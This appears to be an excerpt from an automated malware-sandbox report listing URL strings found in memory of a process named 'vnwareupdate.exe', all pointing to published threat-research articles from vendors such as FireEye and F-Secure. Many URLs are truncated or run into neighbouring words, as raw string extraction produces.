Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: https://www.endgame.com/blog/your-package-has-been-successfully-encrypted-teslac
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.enterprisetimes.co.uk/201
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.enterprisetimes.co.uk/201.
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.enterprisetimes.co.uk/201Analyzing
Source: vnwareupdate.exe, 00000003.00000003.237611046.00000000038E7000.00000004.00000001.sdmp	String found in binary or memory: https://www.esentire.com/news-and-events/security-advisories/kaseya-virtual-syst
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.esentire.com/news-and-events/security-advisories/kaseya-virtual-systl
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdfIranian
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/documents/996508/1030745/callisto-groupGrand
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/documents/996508/1030745/cosmicduke_whitepaper.pdf
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/documents/996508/1030745/cosmicduke_whitepaper.pdfCOSMICDUKE
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/documents/996508/1030745/cosmicduke_whitepaper.pdfUpdated
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/documents/996508/1030745/w32_regin_stage_1.pdf
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/weblog/archives/00002764.html
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/weblog/archives/00002780.html
Source: vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/weblog/archives/00002795.html
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/weblog/archives/00002822.html
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/weblog/archives/00002822.htmlDuke
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.f-secure.com/weblog/archives/00002822.htmlSofacy
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://www.fidelissecurity.com/sites/default/files/FTA_1013_RAT_in_a_jar.pdf
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: https://www.fidelissecurity.com/sites/default/files/FTA_1019_Ratcheting_Down_on_
Source: vnwareupdate.exe, 00000003.00000003.241963093.0000000005611000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_#1020
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_ZEUS
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fidelissecurity.com/sites/default/files/TA_Fidelis_Turbo_1602%283%29
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fidelissecurity.com/sites/default/files/TA_Fidelis_Turbo_1602%283%29The
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fidelissecurity.com/sites/default/files/TA_Fidelis_Turbo_1602%283%29Ukranian
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2012/12/to-russia-with-apt.html
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/02/operation-beebus.htmlBIFROSE
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/02/operation-beebus.htmlHangover
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/04/the-mutter-backdoor-operati
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/04/the-mutter-backdoor-operati0The
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/04/the-mutter-backdoor-operati1Neutrino
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/04/the-mutter-backdoor-operatieThe
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/04/the-mutter-backdoor-operatinThe
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/04/the-mutter-backdoor-operatisThe
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-a
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-aLuaBot:
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-aTrojan.APT.Seinup
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-e
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-e.
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-eOperation
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-ePalebot
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-ePok
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/09/hand-me-downs-exploit-and-i
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-da
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-daOperation
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-daWinnti
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/10/evasive-tactics-terminator-
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/10/evasive-tactics-terminator-Pawn
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-DCSO
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-Illuminating
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-Tracking
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-i
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-iOperation
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-iOrcaRAT
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/02/operation-snowman-deputydogOperation
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/02/operation-snowman-deputydogRecent
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/02/operation-snowman-deputydogThe
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-t
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/07/the-little-signature-that-c
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/07/the-little-signature-that-cThe
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/07/the-little-signature-that-crB
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-Connecting
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-Spoofed
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/08/operation-poisoned-hurrican
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/09/aided-frame-aided-direction
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/09/aided-frame-aided-directionRansomware
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-back
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backByeBye
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backXSLCmd
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backesellsing
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backsOperation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backsXSLCmd
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-ope
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handoverEquationDrug
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handoverNew
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handoverOperation
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handoverThe
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.htmlAPT
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.htmlDarkhotel
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.htmlOperation
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.htmlRSA
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.htmlMicrosoft
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.htmlTeslaCrypt
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/04/analysis_of_kriptovo.html
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.htmlNitlovePOS:
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/10/kemoge_another_mobi.html
Source: vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.htmlAPT
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.htmlChina-based
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.htmlTaiwan
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.ht
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.htmlLuaBot:
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.htmlTREASUREHUNT:
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.htmlApocalypse
Source: vnwareupdate.exe, 00000003.00000003.234133131.0000000005DF3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlKopiLuwak:
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlUpdated
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/06/latest-android-overlay-malw
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/06/locky-is-back-and-asking-fo
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2016/06/resurrection-of-the-evil-mi
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/03/
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/03//Nebula
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/03/APT29
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/03/Without
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.h
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.htmlBdCVE-2017-0199
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.htmlCVE-2017-0199
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.htmlMassive
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.htmlBernhardPOS
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.htmlFIN7
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlAPT32
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlPowerShell
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.ht
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.htEPS
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.htThe
Source: vnwareupdate.exe, 00000003.00000003.241963093.0000000005611000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-c
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cStrider:
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sAttacks
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sTwoFace
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranianFake
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranianIranian
